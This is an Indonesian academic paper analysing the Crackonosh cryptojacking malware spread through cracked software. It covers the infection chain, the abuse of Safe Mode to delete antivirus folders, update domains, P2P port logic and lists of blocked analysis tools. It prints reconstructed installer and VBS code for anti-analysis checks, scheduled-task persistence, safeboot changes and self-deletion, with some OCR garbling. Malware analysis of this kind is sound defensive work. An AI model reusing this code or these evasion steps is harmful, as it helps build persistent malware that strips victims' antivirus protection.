Analisis Pola dan Dampak Serangan Cryptojacking dengan Menggunakan Metode Analisis Dinamis dan Analisis Statis

Mesakh Herdian Pamungkas^*, Dian Widiyanto Chandra

Fakultas Teknologi Informasi, Teknik Informatika, Universitas Kristen Satya Wacana, Salatiga, Indonesia Email: ¹672018105@student.uksw.edu, ^2,dian.chandra@uksw.edu

Email Penulis Korespondensi: 672018105@student.uksw.edu Submitted 27-10-2022; Accepted 31-10-2022; Published 31-10-2022

Abstrak

Di era globalisasi saat ini, aktivitas sehari-hari masyarakat sangat bergantung pada teknologi. Perkembangan teknologi ini tentunya dimanfaatkan oleh banyak pihak yang berbeda. Selain memanfaatkan sisi positifnya, ada juga bagian yang memanfaatkan sisi negatifnya. Dalam hal ini seperti pengembangan perangkat lunak kriminal atau yang biasa disebut Kejahatan dunia maya. Salah satu bentuk kejahatan ini adalah cryptojacking. Cryptojacking adalah sisi gelap dari penambangan cryptocurrency dan menimbulkan ancaman bagi pengunjung situs web atau end-user. Penelitian ini dilakukan dengan 6 metode tahapan yang menghasilkan hasil bahwa Berdasarkan analisa malware secara statis dan dinamis pemasangan Crackonosh sendiri berjalan dengan cara menggantikan file penting pada sistem Windows dan menyalahgunakan Windows Safe Mode untuk merusak tatanan dan pertahanan sistem Windows.

Kata Kunci: Globalisasi; Teknologi; Cryptojacking; Metode Tahapan; Windows Safe Mode Abstract

In the current era of globalization, people's daily activities are highly dependent on technology. The development of this technology is certainly utilized by many different parties. In addition to taking advantage of the positive side, there are also parts that take advantage of the negative side. In this case it is like developing criminal software or what is commonly called cybercrime. One form of this crime is cryptojacking. Cryptojacking is the dark side of cryptocurrency mining and poses a threat to website visitors or end-users. This research was carried out with a 6-step method which resulted in the result that based on static and dynamic malware analysis, the installation of Crackonosh itself runs by replacing important files on the Windows system and abusing Windows Safe Mode to damage the order and defense of the Windows system.

Keywords: Globalization; Technology; Cryptojacking; Step Method; Windows Safe Mode

1. PENDAHULUAN

Di era globalisasi saat ini, aktivitas sehari-hari masyarakat sangat bergantung pada teknologi baik dalam bidang sosial, politik, ekonomi maupun pendidikan[1]. Dalam dunia pendidikan, teknologi digunakan dalam berbagai hal, seperti penggunaan e-book, e-learning, website dan lain-lain. Perkembangan teknologi ini tentunya dimanfaatkan oleh banyak pihak yang berbeda. Selain memanfaatkan sisi positifnya, ada juga bagian yang memanfaatkan sisi negatifnya[2]. Dalam hal ini seperti pengembangan perangkat lunak kriminal atau yang biasa disebut Kejahatan dunia maya. Salah satu bentuk kejahatan ini adalah cryptojacking. Cryptojacking adalah sisi gelap dari penambangan cryptocurrency dan menimbulkan ancaman bagi pengunjung situs web atau end-user. Fokus pada cryptojacking (juga dikenal sebagai malicious cryptomining dan drive-by mining), sebuah istilah yang diciptakan untuk menggunakan sumber daya komputasi end-user yang tidak diketahui[3].

Cryptojacking baru-baru ini menjadi salah satu ancaman keamanan siber yang tumbuh paling cepat. Sebuah laporan dari McAfee Labs menunjukkan bahwa aktivitas malware cryptojacking meningkat lebih dari 4000% pada tahun 2018. Statistik McAfee secara khusus merujuk pada jumlah total malware cryptojacking. Salah satu kasus yang terkena serangan crypto adalah situs web Dewan Kota Manchester dan lebih dari 4.000 situs web lain yang terinfeksi dengan kode yang mengoperasikan cryptocurrency Monero. Information Commissioner’s Office (ICO), situs web pengadilan AS, dan beberapa lembaga National Health Service (NHS) juga telah terinfeksi kode berbahaya[4]. Untuk kasus kejahatan crypto yang telah dibawa ke pengadilan, salah satunya, Unit Polisi Cyber Nasional Ukraina, telah menangkap seorang pria berusia 32 tahun yang diduga menempatkan Script serangan cryptocurrency di situs web pendidikan yang dibuatnya.

Situs ini memiliki 1,5 juta pengunjung setiap bulan. Menurut laporan polisi, malware yang dipasang di situs web ini menggunakan sumber daya pengunjung untuk menambang cryptocurrency secara ilegal[5].

Dalam beberapa penelitiannya, menunjukkan bagaimana vektor serangan cryptojacking menyerang beberapa komponen penting e-commerce (URL, HTTP, dan HTML)[6]. Studi ini juga mengevaluasi pendekatan pemodelan dengan dua skenario serangan menggunakan sistem operasi yang berbeda. Hasil pemodelan menunjukkan bahwa serangan cryptojacking bersifat lintas platform dan dapat terjadi pada sistem operasi perangkat apa pun yang mendukung browser.

Analisis lalu lintas jaringan yang dihasilkan selama serangan seperti URL, pemindaian file, hash kriptografi, dan penggunaan CPU digunakan sebagai indicator of compromise yang bertindak sebagai umpan ke dalam sistem deteksi intrusi[7]. Dalam penelitian ini membandingkan metode sistem dengan analisis statis, analisis dinamis, dan analisis ekonomi. Di luar analisis statis masih terbatas dan dapat dikelabui oleh teknik yang obfuscation kode JavaScript. Dalam sebuah studi yang dilakukan dengan analisis dinamis penggunaan kode JavaScript, cryptojacking mempengaruhi sumber daya host, CPU dan baterai, dan kemudian dianalisis karakteristik cryptojacking dalam penggunaan sumber daya[8].

Sesuai pemaparan yang ada, maka yang menjadi rumusan masalah dalam penelitian ini adalah bagaimana mencari pola dan dampak dari Cryptojacking dengan menggunakan metode Analisis Dinamis dan Analisis Statis[9].

2. METODOLOGI PENELITIAN

Tahapan penelitian ini ada 6 tahapan, yakni, Tahap pertama mengidentifikasi dan merumuskan masalah dari judul terhadap permasalahan yang ada terkait dengan proses Analisis cyberjacking menggunakan metode Analisis Dinamis dan Analisis Statis[2], [10]–[14]; Tahap kedua menyusun kerangka teori yang merupakan rencana dari penelitian secara keseluruhan; Tahap ketiga melakukan kajian pustaka terutama terhadap penelitian sebelumnya; Tahap keempat Setting up Virtual Machine yang digunakan sebagai Virtual Lab[1], [15]; Tahap kelima melakukan pengujian sistem operasi yaitu dengan menggunakan Flare OS dengan menjalankan malware yang berbeda dan apakah dapat berjalan dengan baik atau tidak[16]; Tahap keenam melakukan Analisis proses pengujian Malware[10]; Tahap terakhir yang dilakukan adalah dokumentasi dan menyusun laporan dari hasil rancangan yang telah dilakukan.

3. HASIL DAN PEMBAHASAN

Hasil dari penelitian ini adalah Analisis dampak dan pola dari Malware Cryptojacking malware yang digunakan adalah Crackonosh kenapa bisa disebut sebagai Crackonosh karena malware tersebut didistribusikan bersama dengan Salinan illegal dari perangkat lunak popular dan mencari dan menonaktifkan banyak program antivirus populer, sebagian program anti deteksi malware, dan anti-forensik. Malware tersebut akan diimplementasikan pada Laptop dengan menggunakan Sistem Operasi Windows 10 dan FlareOs v3 sebagai wadah untuk analisa malware. Proses infeksi atau pemasangan Crackonosh ini ditunjukkan pada gambar 1.

3.1 Proses Pemasangan Crackonosh

User mendapatkan software perangkat lunak dengan lisensi illegal atau biasa disebut Cracked Software dan menjalankan program tersebut. Pada tahap pemasangan software akan menjalankan Maintenance.vbs, Maintenance.vbs tersebut menjalankan pemasangan menggunakan serviceinstaller.msi, serviceinstaller.msi menjalankan registry agar bisa menjalankan serviceinstaller.exe yaitu program utama yang digunakan untuk mengeksekusi perangkat user. Lalu Serviceintaller.exe akan meluncurkan StartupCheckLibrary.dll yang nantinya StartupCheckLibrary.dll digunakan untuk mengunduh dan menjalankan wksprtcli.dll, wksprtcli.dll meluncurkan file exe baru yang bernama winlogui.exe dan meluncurkan winscomrssrv.dll dan winrmsrv.exe yang mana membawa decrypts dan menempatkannya dalam folder tertentu.

Dari pemasangan Crackonosh bisa diidentifikasi bahwa malware tersebut membawa 30 versi berbeda file serviceinstaller.exe yang setiap serviceinstaller.exe membawa file malware yang digunakan. Hal tersebut mudah diketahui karena serviceinstaller.exe dimulai dari registry key yang dibuat oleh Maintenance.vbs.

Satu – satunya petunjuk yang ada sebelum Maintenance.vbs menciptakan registry key dan bagaimana file ini dapat muncul di perangkat user adalah dengan cara menghapuskan InsatllWinSAT pada Maintenance.vbs log pencopotan ketika mencoba untuk mencopot pemasangan malware Crackonosh. Bisa di lihat pada gambar 2.

Gambar 2. Unistallation log ketika mencopot pemasangan Malware

Pada gambar 2 menyebutkan bahwa crackonosh berada di bawah file dengan kata sandi yang mengamankan file tersebut, yang akan terbuka dalam proses pemasangan. Inno Setup adalah program pemasangan yang digunakan pada malware ini yang mengeksekusi seluruh skrip. Apabila program pemasangan ini menemukan tanda “aman” untuk

Gambar 1. Diagram Pemasangan

menjalankan malware tersebut maka secara otomatis Inno Setup akan menjalankan pemasangan Malware Crackonosh pada %SystemRoot%\system32\ dan satu konfigurasi file pada %localappdata%\Programs\Common dan kemudian membuat sebuah tugas penjadwalan di Windows Task Scheduler yang nantinya untuk memerintah InstallWinSAT untuk menjalankan Maintenance.vbs dan StartupCheckLibrary untuk memulai StartupcheckLibrary.vbs dan apabila hal tersebut tidak berjalan maka malware tersebut tidak akan dapat menginfeksi perangkat user.

Skrip tersebut dapat mendeteksi bahwa berapa jumlah core pada prosessor pada sistem, dan dapat mendeteksi program dari apakah terdapat register dari program tersebut file yang ada di dalam sistem tersebut dan program yang berjalan di background sistem tersebut. Contoh program tersebut adalah jika dipasangkan pada Virtual Machine, Sysinternals (Process Explorer), Wireshark, antivirus Emsisoft, antivirus Malwarebytes. Crackonosh menggunakan beberapa tindakan spesifik untuk menghindari keamanan dan analisa aplikasi. Tindakan – tindakan spesifik yang digunakan untuk menghindari dan menonaktifkan keamanan aplikasi termasuk beberapa hal pada Tabel 1:

Tabel 1. Tindakan Tindakan Malware Untuk Menghindari Ditemukan Tindakan Dilakukan Malware

Menghentikan pembaruan Windows.

Menghapus aplikasi anti-Virus dalam mode aman.

Menggantikan keamanan windows dengan manipulasi green tick pada ikon tray.

Menggunakan Library yang tidak menggunakan DllMain ketika Library sedang digunakan sebagai eksekutor utama (dengan rundll32.exe) namun sebaliknya fungsi – fungsi lainnya yang diekspor oleh malware.

Serviceinstaller dijalankan untuk mengecheck apakah dalam mode aman.

Software pemasangan Crackonosh akan memasangkan sistem registry maintenance.vbs ke sistem agar selalu berjalan setiap sistem menyala dan maintenance.vbs membuat sebuah perhitungan berapa kali sistem mati dan menyala kembali, jika skrip sudah menghitung sistem menyala sebanyak 10 kali maka maintenance.vbs akan menjalankan serviceinstaller.msi, mematikan mode hibernate(mode tidur), dan mengatur sistem agar menjalankan safe mode (mode aman) pada saat sistem menyala pada sistem yang terinfeksi, dan secara otomatis akan menghapus maintenance.vbs dan serviceinstaller.msi.

3.2 Safe mode

Antivirus tidak akan berjalan dengan baik ketika kita Sistem Windows dalam keadaan safe mode, Crackonosh akan mengaktifkan serviceinstaller.msi untuk dengan mudah menonaktifkan dan menghapus Windows Defender dan juga menggunakan WQL (WMI Query Language) untuk membuat list semua Software antivirus yang terpasang pada perangkat user dengan query SELECT * FROM AntiVirusProduct dan apabila WQL ini mendeteksi adanya antivirus yang terpasang maka WQL menghapus antivirus dengan menjalankan perintah rd <AV directory> /s /q. perintah dimana <AV directory>

adalah nama direktori bawaan dari produk antivirus user gunakan. Tabel 1 list antivirus yang ada pada perintah WQL:

Tabel 2. Daftar Anti Virus pada Perintah WQL Anti Virus

Adaware Bitdefender Escan F-secure Kaspersky

Mcafee (Scanner only) Norton

Panda

WQL ini dapat mendeteksi beberapa nama folder yang beragam, dimana mereka terpasang dan akhirnya menghapus %PUBLIC%\Desktop\. Serviceinstaller.exe juga memasukkan file StartupCheckLibrary.dll dan winlogui.exe pada folder %SystemRoot%\System32\ yang berisi coinminer XMRig dan mendaftarkan registry pada perangkat user sebagai berikut.

Gambar 3. Pendaftaran Registry dari Serviceinstaller.exe

Pada gambar 3 pendaftaran registry dari Serviceinstaller.exe ini berguna untuk menghubungkan perangkat yang terinfeksi ke aplikasi mining setiap kali perangkat dinyalakan, mematikan Windows Defender dan Windows Update.

Pada gambar 4 adalah beberapa Registry yang dihapus oleh Malware untuk menghentikan berjalannya Windows Defender dan mematikan pembaruan otomatis. Pada tahap ini Windows Defender memasang program MSASCuiL.exe sendiri yang mana membuat ikon Windows Security Ke system tray.

Gambar 4. Perintah yang di eksekusi Serviceinstaller.exe 3.3 Malware Update

Gambar 5. Tangkapan layar Dekripsi IP address dari IDA PRO StartupCheckLibrary.dll

Crackonosh menggunakan StartupCheckLibrary.dll untuk mendownload semua pembaharuan malware yang menginfeksi perangkat user. StartupCheckLibrary.dll akan membuat list query data TXT DNS untuk domain first.universalwebsolutions.info, second.universalwebsolutions.info, getnewupdatesdownload.net, webpublicservices.org dan juga ada data TXT DNS seperti ajdbficadbbfC@@@FEpHw7Hn33. Dari tangkapan aplikasi IDA PRO dari StartupCheckLibrary.dll dapat ditemukan ip yang terenkripsi seperti gambar 6 dibawah ini.

Gambar 6. Task yang dibuat di Windows Task Scheduler dari wksprtcli.dll

Dari gambar 5 pada 6 huruf pertama bisa dikalkulasi sebagai alamat IP. Dan 5 huruf selanjutnya port yang terenkripsi dan dapat dibaca jika ditambahkan 16. Data enkripsi di atas memberikan sebuah soket dimana bisa mengunduh wksprtcli.dll. dan 8 huruf terakhir adalah versi dari malware yang diunduh. Data yang terunduh akan tervalidasi pada salah satu public key yang telah tersimpan pada file konfigurasi. Setelah terjadi adanya koneksi ke update Crackonos, malware akan menambahkan konfigurasi baru dan menginstall winrmsrv.exe dan wincomrssrv.dll. dan juga mengubah cara untuk memulai malware winlogui.exe dari registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run menjadi Task yang terjadwal pada saat User menghidupkan perangkat.

3.4 Analisa Pada Winrmsrv.exe

Winrmsrv.exe bertanggung jawab atas koneksi P2P dari perangkat yang terinfeksi malware Crackonosh. Winrmsrv.exe mengubah informasi pada setiap versi Crackonosh dan mampu melakukan pengunduhan akan versi terbaru dari Crackonosh. Winrmsrv.exe juga melakukan pencarian terhadap koneksi internet, apabila berhasil melakukan koneksi, Winrmsrv.exe akan menyambungkan 3 port yang berbeda sebagai berikut: pertama pada file config terdapat offset (49863) dan range (33575). Setiap port akan menghitung SHA-256 dari tanggal yang sesuai dengan unix epoch time atau pengaturan waktu pada masing masing perangkat, dan 10B dari setiap file config. Setiap port akan di set sebagai offset dan ditambahkan setiap huruf pertama dari modul SHA dengan rumus range (offset + (2B of SHA %range)). Dua port pertama digunakan sebagai penerima koneksi TCP, dan port terakhir digunakan sebagai untuk menerima koneksi UDP dari server Crackonosh.

Gambar 7. Tangkapan layar port yang dihasilkan dari IDA PRO Winrmsrv.exe

Selanjutnya winrmsrv.exe akan mulai mengirim paket UDP yang berisikan versi dan stempel waktu dari seluruh update dan waktu Crackonosh menginfeksi perangkat dari alamat IP secara acak kepada port ke 3. Paket tersebut akan dikirim dengan byte yang memiliki panjang acak dan ter enkripsi menggunakan Vigenère cipher.

Apabila winrmsrv.exe menemukan alamat IP yang telah terinfeksi oleh Crackonosh, winrmsrv.exe menyimpan alamat IP, versi dari Crackonosh dan memperbaharui sistem malware lama dengan sistem yang lebih baru. Data dari pembaharuan tersebut ditandai dengan private key. Saat perangkat menyala winrmsrv.exe akan melakukan koneksi ke semua alamat IP yang sudah tersimpan dan akan melakukan pengecekan versi Crackonosh berdasarkan koneksi alamat IP yang sudah tersimpan tersebut sebelum menggunakan alamat IP baru dari Crackonosh. Koneksi Crackonosh akan terputus secara otomatis setelah koneksi jika terjadi kejanggalan pada sistem atau koneksi tidak mengikuti protokol yang sudah di susun Crackonosh, koneksi terputus selama 4 jam, setelah atau setelah perangkat di restart. winrmsrv.exe juga memiliki fungsi tersendiri untuk menyembunyikan filenya agar tidak terdeteksi oleh user ketika di cari menggunakan software atau tool tertentu, dengan menggunakan nama file Windows seperti winlogui.exe. winrmsrv.exe juga memeriksa proses yang sedang berjalan di komputer, winrmsrv.exe dan winlogui.exe akan secara paksa mati dan hilang dan akan aktif ketika perangkat dinyalakan kembali lain waktu. Tabel 3 adalah proses yang di block oleh winrmsrv.exe.

Tabel 3. Proses yang di Block Oleh Winrmsrv.exe Proses Yang Berjalan

Dumpcap.exe fiddler.exe frst.exe frst64.exe fse2.exe mbar.exe

messageanalyzer.exe netmon.exe

networkminer.exe ollydbg.exe procdump.exe procdump64.exe procexp.exe procexp64.exe procmon.exe procmon64.exe rawshark.exe

rootkitremover.exe sdscan.exe sdwelcome.exe splunk.exe

Gambar 13. Tangkapan layar paket UDP dari Wireshark 3.5 Pesan Error

Pada perangkat yang terinfeksi malware Crackonosh akan muncul pesan error file Maintenance.vbs sebagai berikut.

Kedua error di atas adalah error yang ada pada pemasangan Crackonosh.

Gambar 8. Can not find script file

Gambar 8 Type. mismatch: ‘Clnt’, Code: 800A000D 3.6 Rekonstruksi Crackonosh menggunakan Inno Setup installer script

Rekonstruksi Crackonosh menggunakan bahasa C keseluruhan code rekonstruksi script Crackonosh adalah sebagai berikut.

Rekonstruksi Pemasangan.iss

#include <stdio.h>

#include <stdlib.h>

function time32(Arg0: ?): ? cdecl;

external '_time32@msvcrt.dll cdecl';

procedure !MAIN();

begin

exit;

end;

function INCLUDEINSTALLER(): BOOLEAN;

var

result: Integer;

begin

result := 1;

if STRTOINT (GETENV( 'NUMBER_OF_PROCESSORS')) < 4 then result := 0;

if REGKEYEXISTS(0x80000001, 'SOFTWARE\Sysinternals') then result := 0;

if REGKEYEXISTS(0x80000002,

"SOFTWARE\WOW6432Node\Microsoft\Windows

\CurrentVersion\Uninstall\Wireshark') then result := 0;

if FILEEXISTS (EXPANDCONSTANT('{sys}\setup4.2.6.tmp')) then result := 0;

if _time32(0) < 1533304240 then result := 0;

if FILEEXISTS(EXPANDCONSTANT ('{userdesktop}\setup4.2.6. tmp')) then result := 1;

if REGKEYEXISTS(0x80000002, 'SOFTWARE\Emsisoft') then result := 0;

if REGKEYEXISTS(8x80000002,

'SYSTEM\CurrentControlSet\services\NanoServiceMain') then result := 0;

if REGKEYEXISTS(0x80000002, 'SOFTWARE\Classes\malwarebytes') then result := 0;

exit;

end;

procedure RUNINSTALL();

var

v_1: Integer;

v_2: BOOLEAN;

begin

if INCLUDEINSTALLER() <> 1 then exit;

FILECOPY (EXPANDCONSTANT('{app}\x64\audio\sfx\WEAPONS_PLAYER3.rpf'), EXPANDCONSTANT('{sys}\7z.exe'), v_2);

FILECOPY

(EXPANDCONSTANT('{app}\x64\audio\sfx\WEAPONS_PLAYER4.rpf')EXPANDCONSTANT('{sys}\

7z.exe'), v_2);

EXEC(EXPANDCONSTANT ('{sys}\7z.exe'), EXPANDCONSTANT('-ir!*.*? e -

pdplokf4wd Gplo7D -y "{app}\x64\audio\sfx\WEAPONS_PLAYER1.rpf" -o{sys}'), '', 0, 1, v_1);

EXEC(EXPANDCONSTANT ('{sys}\7z.exe'), EXPANDCONSTANT('-ir!*.*? e - pdplokf4wd0Gplo7D -y "{app}\x64\audio\sfx\WEAPONS_PLAYER2.rpf" -

o{localappdata}\Programs\Common'),'', 0, 1, v_1);

EXEC(EXPANDCONSTANT ('{sys}\SchTasks.exe'), EXPANDCONSTANT ('/Create /SCC ONLOGON /TN "Microsoft\Windows \Maintenance\InstallwinSAT" /TR Maintenance.vbs /RL HIGHEST /F'),'', 0, 1, v_1);

EXEC(EXPANDCONSTANT ('{sys}\SchTasks.exe'), EXPANDCONSTANT('/Create /SC ONLOGON /TN "Microsoft\Windows\Application Experience\StartupCheckLibrary" /TR StartupCheck.vbs /RL HIGHEST /F'),'', 0, 1, v_1);

DELETEFILE(EXPANDCONSTANT ('{sys}\7z.exe'));

DELETEFILE(EXPANDCONSTANT ('{sys}\7z.dll'));

DELETEFILE(EXPANDCONSTANT ('{app}\x64\audio\sfx\WEAPONS_PLAYER1.rpf'));

DELETEFILE(EXPANDCONSTANT ('{app}\x64\audio\sfx\WEAPONS_PLAYER2.rpf'));

DELETEFILE(EXPANDCONSTANT ('{app}\x64\audio\sfx\WEAPONS_PLAYER3.rpf'));

DELETEFILE(EXPANDCONSTANT ('{app}\x64\audio\sfx\WEAPONS_PLAYER4.rpf'));

exit;

end;

Saat pemasangan Crackonosh akan meregistrasi maintenance.vbs script ke Task Manager dan diatur agar berjalan secara otomatis ketika sistem menyala. maintenance.vbs script membuat sistem yang menangkal.

Rekonstruksi maintenance.vbs script Dim ccdat

ccdat = "updatesettings.dbf"

Dim fso, setting, cc, strArgs

strArgs = "%comspec% /C %SystemRoot%\System32\msiexec.exe /i

%SystemRoot%\System32\ServiceInstaller.msi /qn & "&

"del %SystemRoot%\System32\ServiceInstaller.msi &

%SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal & "&

"%SystemRoot%\System32\powercfg.exe /hibernate off & schtasks /Delete /TN

""Microsoft\Windows\Maintenance\InstallWinSAT"" /F"

Set fso = CreateObject("Scripting.FileSystemObject") If (fso.FileExists(ccdat)) Then

Set setting = fso.0penTextFile(ccdat, 1, 0) cc = Int(setting.ReadLine)

setting.Close

If(cc > 9) Then

oShell.Run strArgs, 0, false

Set objFSO = CreateObject("Scripting.FileSystemObject") strScript = Wscript.ScriptFullName

objFS0.DeleteFile(ccdat) objFS0.DeleteFile(strScript) WScript.Quit()

End If

Set setting = fso.CreateTextFile(ccdat, True, False) cc = cc+1

setting.Write(cc) setting.Close WScript.Quit() Else

Set setting = fso.CreateTextFile(ccdat, True, False) setting.Write("0")

setting.Close WScript.Quit() End If

4. KESIMPULAN

Berdasarkan analisa malware secara statis dan dinamis pemasangan Crackonosh sendiri berjalan dengan cara menggantikan file penting pada sistem Windows dan menyalahgunakan Windows Safe Mode untuk merusak tatanan dan pertahanan sistem Windows. Malware ini kemudian melindungi dirinya sendiri dengan cara menonaktifkan keamanan, mematikan pembaruan sistem, dan menggunakan Teknik anti analisis lain yang mencegah malware ini ditemukan yang mana membuat malware sulit dideteksi dan di hilangkan. Selama masih ada orang yang melakukan pengunduhan pada aplikasi bajakan, penyerangan seperti ini akan terus menguntukan bagi para pembajak dan pembuat malware. Nilai moral dari analisa malware ini adalah bahwa kita tidak bisa mengharapkan untuk mendapatkan sesuatu dari barang curian, ketika kita mencoba untuk mencuri aplikasi dengan mengunduh versi bajakannya, seseorang juga pastinya sedang berusaha untuk mencuri sesuatu dari kita.

REFERENCES

[1] S. H. Kok, A. Abdullah, and N. Z. Jhanjhi, “Early detection of crypto-ransomware using pre-encryption detection algorithm,” J.

King Saud Univ. - Comput. Inf. Sci., vol. 34, no. 5, pp. 1984–1999, May 2022, doi: 10.1016/j.jksuci.2020.06.012.

[2] D. Harley et al., “Big Bad Botnets,” in AVIEN Malware Defense Guide for the Enterprise, Elsevier, 2007, pp. 123–179. doi:

10.1016/b978-159749164-8.50010-5.

[3] E. Tekiner, A. Acar, A. S. Uluagac, E. Kirda, and A. A. Selcuk, “SoK: Cryptojacking malware,” in Proceedings - 2021 IEEE European Symposium on Security and Privacy, Euro S and P 2021, 2021. doi: 10.1109/EuroSP51992.2021.00019.

[4] “Crackonosh: A New Malware Distributed in Cracked Software - Avast Threat Labs.”

https://decoded.avast.io/danielbenes/crackonosh-a-new-malware-distributed-in-cracked-software/ (accessed Oct. 20, 2022).

[5] A. Sood and R. Enbody, Targeted Cyber Attacks. Elsevier, 2014. doi: 10.1016/C2013-0-14275-4.

[6] A. D. YULIANTO, “Penanganan Cryptojacking Menggunakan Pattern Matching Analysis,” 2019, Accessed: Oct. 20, 2022.

[Online]. Available: https://repository.telkomuniversity.ac.id/home/catalog/id/151961/slug/penanganan-cryptojacking- menggunakan-pattern-matching-analysis.html

[7] L. Y. Connolly and D. S. Wall, “The rise of crypto-ransomware in a changing cybercrime landscape: Taxonomising countermeasures,” Comput. Secur., vol. 87, Nov. 2019, doi: 10.1016/j.cose.2019.101568.

[8] U. Kristen Satya Wacana Salatiga, “Analisis Serangan Flame pada Ancaman Sabotase Sistem Jaringan Komputer,” 2016, Accessed: Oct. 20, 2022. [Online]. Available: https://repository.uksw.edu//handle/123456789/11313

[9] G. Gomes, L. Dias, and M. Correia, “CryingJackpot: Network Flows and Performance Counters against Cryptojacking,” in 2020 IEEE 19th International Symposium on Network Computing and Applications, NCA 2020, 2020. doi:

10.1109/NCA51143.2020.9306698.

[10] A. Yazdinejad, H. HaddadPajouh, A. Dehghantanha, R. M. Parizi, G. Srivastava, and M. Y. Chen, “Cryptocurrency malware hunting: A deep Recurrent Neural Network approach,” Appl. Soft Comput. J., vol. 96, Nov. 2020, doi:

10.1016/j.asoc.2020.106630.

[11] S. Madan, S. Sofat, and D. Bansal, “Tools and Techniques for Collection and Analysis of Internet-of-Things malware: A systematic state-of-art review,” J. King Saud Univ. - Comput. Inf. Sci., 2022, doi: 10.1016/j.jksuci.2021.12.016.

[12] H. Darabian et al., “Detecting Cryptomining Malware: a Deep Learning Approach for Static and Dynamic Analysis,” J. Grid Comput., vol. 18, no. 2, 2020, doi: 10.1007/s10723-020-09510-6.

[13] K. Dunham, Mobile Malware Attacks and Defense. Elsevier, 2009. doi: 10.1016/B978-1-59749-298-0.X0001-8.

[14] N. Widiyasono, A. P. Aldya, and R. R. Ardhian, “Analisis Pola Dan Dampak Serangan Cryptojacking Dengan Menggunakan Pendekatan Dynamic Analysis,” CESS (Journal Comput. Eng. Syst. Sci., vol. 6, no. 1, 2021, doi: 10.24114/cess.v6i1.20008.

[15] “How to Get and Set Up a Free Windows VM for Malware Analysis.” https://zeltser.com/free-malware-analysis-windows-vm/

(accessed Oct. 20, 2022).

[16] S. Balamurugan and M. Thangaraj, “Cryptojacking malware detection using the bayesian consensus clustering with large iterative multi-tier ensemble in the cryptocurrency in the cloud,” Int. J. Recent Technol. Eng., vol. 8, no. 3, 2019, doi:

10.35940/ijrte.C5159.098319.

[17] D. Ko, S.-H. Choi, S. Hwang, and Y.-H. Choi, “Cryptojacking Attack Using Pastejacking and Defense Method,” J. Korean Inst.

Commun. Inf. Sci., vol. 44, no. 8, 2019, doi: 10.7840/kics.2019.44.8.1623.